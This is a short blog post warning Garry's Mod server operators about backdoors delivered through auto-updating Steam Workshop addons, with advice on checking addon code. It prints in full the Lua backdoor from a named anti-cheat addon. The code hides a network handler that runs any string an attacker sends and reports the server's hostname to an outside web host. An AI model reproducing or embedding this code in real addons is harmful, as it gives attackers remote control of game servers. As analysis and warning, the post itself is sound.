Garry's Mod Workshop Backdoors

Garry’s Mod is a pretty popular game now, and it’s easier to use than ever with the built in Steam Workshop support. Workshop addons can be installed on clients, but servers can also subscribe to addons.

The problem with the Workshop system is that addons will auto-update when you launch the game or start the server. You have no choice in the matter either, unless you manually add the addons by extracting them into your addons folder.

This means that the author of any addon you are subscribed to has the ability to run any code they want on your server. All they have to do is update their addon with some malicious code, and then once your server restarts, they have full control.

The author of the Screen Grabber (Anti-Cheat!) addon did this, and appears to have caused some mayhem on a few servers with this piece of code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
if (SERVER && game.IsDedicated()) then 
timer.Simple(30,function()
local onr = net.Receive
net.Receive = function(n, ...)
if (n != "bdsm") then
onr(n, unpack({...}))
end
end

util.AddNetworkString("bdsm")
onr("bdsm", function(l, p)
RunString(net.ReadString())
end)

http.Post("http://www.bg-server.3owl.com/", {hn = GetConVarString("hostname"), id = "Screen Capture"}, function(s) end, function(e) end)
end)
end

What if someone used an exploit to run native code from Lua, and pushed out an update to thousands of subscribers? The consequences could be a lot worse than some server having a few people messing with it.

So there are a few take home messages:

  • Auto-updating is bad news - if you’re going to use the Workshop on your server, manually add the contents of the GMAs to your addons folder.
  • If you’re running a popular server, make sure you check the code that you’re running on it. Most of these backdoors are pretty lame and just call RunString. Even if you don’t know Lua, you can still do a “Find in Folders” search for RunString to see if there’s anything shady going on.
  • Don’t jump to conclusions about how someone has compromised your server. Make sure you know how the attackers got in so you can properly fix the problem.